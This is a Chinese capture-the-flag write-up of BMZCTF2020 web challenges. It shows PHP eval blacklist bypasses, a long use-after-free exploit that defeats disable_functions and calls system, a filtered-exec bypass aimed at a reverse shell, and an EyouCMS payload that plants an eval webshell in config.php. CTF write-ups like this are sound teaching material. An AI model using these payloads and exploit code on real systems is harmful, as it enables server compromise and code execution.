文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2021-01-03   2.3k

BMZCTF2020 Web WriteUp

0x01 easyeval

1
2
3
4
5
6
7
8
9
<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);

?>

拼接绕过

1
cmd=('s'.'y'.'s'.'t'.'e'.'m')("cat /flag");

十六进制绕过

1
cmd=hex2bin('73797374656d')('cat /flag');

异或

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import string

char = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:
for i in char:
for j in char:
if(ord(i)^ord(j) == ord(res)):
tmp1 += i
tmp2 += j
break
else:
continue
break
print(tmp1,tmp2)

取反

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
//在命令行中运行

/*author yu22x*/

fwrite(STDOUT,'[+]your function: ');

$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

fwrite(STDOUT,'[+]your command: ');

$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';

0x02 easyphp

1
2
3
4
5
6
7
8
<?php 
highlight_file(__FILE__);
$cmd=$_POST['a'];
if(strlen($cmd) > 25){
die();
}else{
eval($cmd);
}

先看一下phpinfo的内容,PHP版本7.3,禁掉了很多函数。

蚁剑的绕过方式都失败了,参考脚本https://xz.aliyun.com/t/8355

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
<?php
error_reporting(0);
$a = str_repeat("T", 120 * 1024 * 1024);
function i2s(&$a, $p, $i, $x = 8) {
for($j = 0;$j < $x;$j++) {
$a[$p + $j] = chr($i & 0xff);
$i >>= 8;
}
}

function s2i($s) {
$result = 0;
for ($x = 0;$x < strlen($s);$x++) {
$result <<= 8;
$result |= ord($s[$x]);
}
return $result;
}

function leak(&$a, $address) {
global $s;
i2s($a, 0x00, $address - 0x10);
return strlen($s -> current());
}

function getPHPChunk($maps) {
$pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /';
preg_match_all($pattern, $maps, $match);
foreach ($match[1] as $value) {
list($start, $end) = explode("-", $value);
if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) {
$address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length);
echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n";
return $address;
}
}
}

function bomb1(&$a) {
if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) {
return (s2i($_GET["test1"]) & 0x7ffff0000000);
}else {
die("[!]Where is here");
}
}

function bomb2(&$a) {
$start = s2i($_GET["test2"]);
return getElement($a, array($start, $start + 0x200000, 0x200000));
die("[!]Not Found");
}

function getElement(&$a, $address) {
for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) {
$addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000;
for ($y = 0;$y < 5;$y++) {
if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){
echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n";
return $addr + $y * 0x08 - 0x18;
}
}
}
}

function getClosureChunk(&$a, $address) {
do {
$address = leak($a, $address);
}while(leak($a, $address) !== 0x00);
echo "[+]Closure Chunk: " . dechex($address) . "\n";
return $address;
}

function getSystem(&$a, $address) {
$start = $address & 0xffffffffffff0000;
$lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000;
for($i = 0; $i < 0x1000 * 0x80; $i++) {
$addr = $start - $i * 0x20;
if ($addr < $lowestAddr) {
break;
}
$nameAddr = leak($a, $addr);
if ($nameAddr > $address || $nameAddr < $lowestAddr) {
continue;
}
$name = dechex(leak($a, $nameAddr));
$name = str_pad($name, 16, "0", STR_PAD_LEFT);
$name = strrev(hex2bin($name));
$name = explode("\x00", $name)[0];
if($name === "system") {
return leak($a, $addr + 0x08);
}
}
}

class Trigger {
function __destruct() {
global $s;
unset($s[0]);
$a = str_shuffle(str_repeat("T", 0xf));
i2s($a, 0x00, 0x1234567812345678);
i2s($a, 0x08, 0x04, 7);
$s -> current();
$s -> next();
if ($s -> current() !== 0x1234567812345678) {
die("[!]UAF Failed");
}
$maps = file_get_contents("/proc/self/maps");
if (!$maps) {
cantRead($a);
}else {
canRead($maps, $a);
}
echo "[+]Done";
}
}

function bypass($elementAddress, &$a) {
global $s;
if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) {
die("[!]Get Closure Chunk Address Failed");
}
$closure_object = leak($a, $closureChunkAddress + 0x18);
echo "[+]Closure Object: " . dechex($closure_object) . "\n";
$closure_handlers = leak($a, $closure_object + 0x18);
echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n";
if(!($system_address = getSystem($a, $closure_handlers))) {
die("[!]Couldn't determine system address");
}
echo "[+]Find system's handler: " . dechex($system_address) . "\n";
i2s($a, 0x08, 0x506, 7);
for ($i = 0;$i < (0x130 / 0x08);$i++) {
$data = leak($a, $closure_object + 0x08 * $i);
i2s($a, 0x00, $closure_object + 0x30);
i2s($s -> current(), 0x08 * $i + 0x100, $data);
}
i2s($a, 0x00, $closure_object + 0x30);
i2s($s -> current(), 0x20, $system_address);
i2s($a, 0x00, $closure_object);
i2s($a, 0x08, 0x108, 7);
echo "[+]Executing command: \n";
($s -> current())("/readflag");
}

function canRead($maps, &$a) {
global $s;
if (!$chunkAddress = getPHPChunk($maps)) {
die("[!]Get PHP Chunk Address Failed");
}
i2s($a, 0x08, 0x06, 7);
if (!$elementAddress = getElement($a, $chunkAddress)) {
die("[!]Get SplDoublyLinkedList Element Address Failed");
}
bypass($elementAddress, $a);
}

function cantRead(&$a) {
global $s;
i2s($a, 0x08, 0x06, 7);
if (!isset($_GET["test1"]) && !isset($_GET["test2"])) {
die("[!]Please try to get address of PHP Chunk");
}
if (isset($_GET["test1"])) {
die(dechex(bomb1($a)));
}
if (isset($_GET["test2"])) {
$elementAddress = bomb2($a);
}
if (!$elementAddress) {
die("[!]Get SplDoublyLinkedList Element Address Failed");
}
bypass($elementAddress, $a);
}

$s = new SplDoublyLinkedList();
$s -> push(new Trigger());
$s -> push("Twings");
$s -> push(function($x){});
for ($x = 0;$x < 0x100;$x++) {
$s -> push(0x1234567812345678);
}
$s -> rewind();
unset($s[0]);

先用蚁剑连接:

再上传至/tmp目录下:

include包含exp.php

0x03 penetration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
highlight_file(__FILE__);
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
$_=array('b','d','e','-','q','f','g','i','p','j','+','k','m','n','\<','\>','o','w','x','\~','\:','\^','\@','\&','\'','\%','\"','\*','\(','\)','\!','\=','\.','\[','\]','\}','\{','\_');
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
if (strlen($ip) <= 18){
if (preg_match ('/' . $blacklisted . '/im', $ip)) {
die('nonono');
}else{
exec($ip);
}

}
else{
die("long");
}
}

}
?>

过滤之后还剩下这些字符可以使用:

1
# $ , / ; ? \ ` | a c h l r s t u v y z 0 1 2 3 4 5 6 7 8 9

由于exec没有回显,应该要使用反弹shell,但是有字数长度限制,这里需要用curl命令读取远程文件绕过一下,而且要把ip地址转换成十进制表示,不知道是我的阿里云站点配置有问题还是怎么回事,我用curl命令+ip地址返回200,但是curl+十进制ip地址就直接给我返回301了,但是我看了宝塔的配置,也没有启用301重定向。

有知道原因的时候师傅可以告知我一下。

0x04 BMZ_Market

综合渗透类型,有点像HackTheBox。

首先进行信息搜集,查看源代码:

robots.txt

一共搜集到两个地方,参数lang和robots.txt

参数lang存在文件包含漏洞,使用伪协议可以读取源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<?php
$password ="Nevergiveup135." ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="BMZ Market">
<meta name="author" content="bmz">

<title>BMZ Market</title>


<link href="bootstrap.css" rel="stylesheet">


<link href="covers.css" rel="stylesheet">
</head>

<body class="text-center">

<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">BMZ Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>

<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">
<?php
if (isset($_GET['lang']))
{
echo $message;
}
else
{
?>

Believe in yourself, you can find the flag
<?php
}
?>
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">more</a>
</p>
</main>

<footer class="mastfoot mt-auto">
<div class="inner">
<p>Power by<a href="#">@kuaile</a></p>
</div>
</footer>
</div>

</body></html>

有一个密码硬编码的地方:Nevergiveup135.,用户名可能是kuaile

robots.txt拿去base64 decode:

发现是颜文字,可以直接拿到浏览器的console界面执行

又给了一个信息:Challenger, the background of the website is -.../--/--../.-/-../--/../-.

后面是一个摩斯编码,解码后的结果是:BMZADMIN,看样子应该是一个后台管理界面,用上面得到的用户名和密码登录进入后台。

可以看到当前的CMS版本是1.3.7,Google已知的利用方式:https://wiki.96.mk/Web安全/Eyoucms/Eyoucms 1.3.9 上传漏洞/

这种利用方式好像打不通,参考mochu师傅的wp

抓包修改参数:

1
&scene=bbb\',${eval($_POST[mochu7])},//

蚁剑连接,sudo -l发现可以无限制执行root命令:

再回头来看看后台上传文件RCE失效的原因:

可能是作者把解压的类文件给删掉了。

来大概跟一下这个漏洞,文件位置在application/admin/controllor/Weapp.php

由于过滤不严,直接把payload写到config.php文件当中:

然后在core/library/think/App.php中包含了config.php

Copyright © ca01h 2019-2021 | 本站总访问量